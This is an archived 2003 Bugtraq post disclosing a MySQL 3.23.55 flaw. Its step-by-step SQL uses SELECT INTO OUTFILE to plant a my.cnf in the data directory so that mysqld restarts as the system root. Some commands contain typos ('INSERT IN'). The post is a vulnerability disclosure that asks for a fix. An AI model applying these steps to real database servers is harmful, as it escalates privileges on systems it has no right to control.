[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: =?iso-8859-1?Q?MySQL_user_can_be_changed_to_root?=
From: "=?iso-8859-1?Q?bugsman () libero ! it?=" <bugsman () libero ! it>
Date: 2003-03-08 11:58:37
[Download RAW message or body]
Hi. I tried this on my own MySQL 3.23.55 !!!
I found out that logging as the root user, we can change mysqld to run as root \
instead that i.e. mysql but this works only if there's just one my.cnf file and it is \
locate in /etc... Here's how I did it...
I logged in as root and than I did this:
mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT
Doing so we have create a my.cnf in mysql datadir containing:
[mysqld]
user=root
Now, when the mysql server will be restarted, the user option in our datadit my.cnf \
will override the one in /etc/my.cnf and mysql server will run as root, with all the \
security flwas that it takes... This is very dangerous if we think that in mysql <= \
3.23.53 it is really easy to get root access due to a bug (an exploit has been \
released publicly)... I dunno how this problem can be solved, I'd like to hear from \
you something... Thanks.... :)
by
Gufino
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic